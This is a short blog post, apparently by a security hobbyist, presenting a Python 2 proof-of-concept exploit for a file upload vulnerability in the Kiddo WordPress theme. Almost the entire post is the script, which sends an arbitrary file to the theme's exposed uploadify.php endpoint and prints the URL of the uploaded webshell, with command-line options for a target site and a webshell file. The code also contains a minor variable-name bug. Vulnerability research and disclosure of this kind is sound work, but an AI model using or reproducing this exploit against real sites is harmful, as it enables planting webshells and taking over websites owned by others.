Kiddo WP Theme Fileupload POC-Nicky's Blog

Kiddo WP Theme Fileupload POC

初学Python写的渣代码

# -*- coding: utf-8 -*

import sys

import urllib2

import os

from poster.encode import multipart_encode

from poster.streaminghttp import register_openers

from optparse import OptionParser

'''

Exploit: Kidoo WP Theme File Upload Vulnerability

Sebug url:https://sebug.net/vuldb/ssvid-61445

Software Link: https://pan.baidu.com/share/link?shareid=4292616786&uk=1192292173&fid=1572047492

Version:kiddo v1.1.3 & Wordpress 3.8.1

Poc Author:Nicky@jdsec.com

'''

def usage():

print "\t|-------------------------------------------------------------------|"

print "\t| Wordpress kiddo Theme Fileupload exploit |"

print "\t| Example:upload.py -u https://target -f /home/nicky/1.php |"

print "\t|-------------------------------------------------------------------|"

def poc(target,filedata):

#通过引入poster模块上传文件

poc="/wp-content/themes/kiddo/app/assets/js/uploadify/uploadify.php"

filename=os.path.basename(filedata)

register_openers()

datagen, headers = multipart_encode({"Filedata": open(filedata, "rb")})

try:

request = urllib2.Request(target+poc,datagen,headers)

result = urllib2.urlopen(request).read()

print "Upload success!"

print "webshell url:"+target+"/"+filename

#输出成功上传的webshell地址

except:

print "Upload failed"

def main():

#参数选择

m =OptionParser(usage = "usage: %prog [options] arg1 arg2")

m.add_option("-u",type="string",action = "store",dest = "url",help = "Target url")

m.add_option("-f",type="string",action = "store",dest = "file",help = "your websell file path",metavar = "FILE")

options,args = m.parse_args()

if len(sys.argv) <= 1:

usage()

if options.url and options.file:

target=options.url

filedata=options.file

poc(target,filedata)

elif options.url:

print "Please enter your webshell file path !"

elif option.file:

print "Please enter your target!"

if __name__ == '__main__':

main()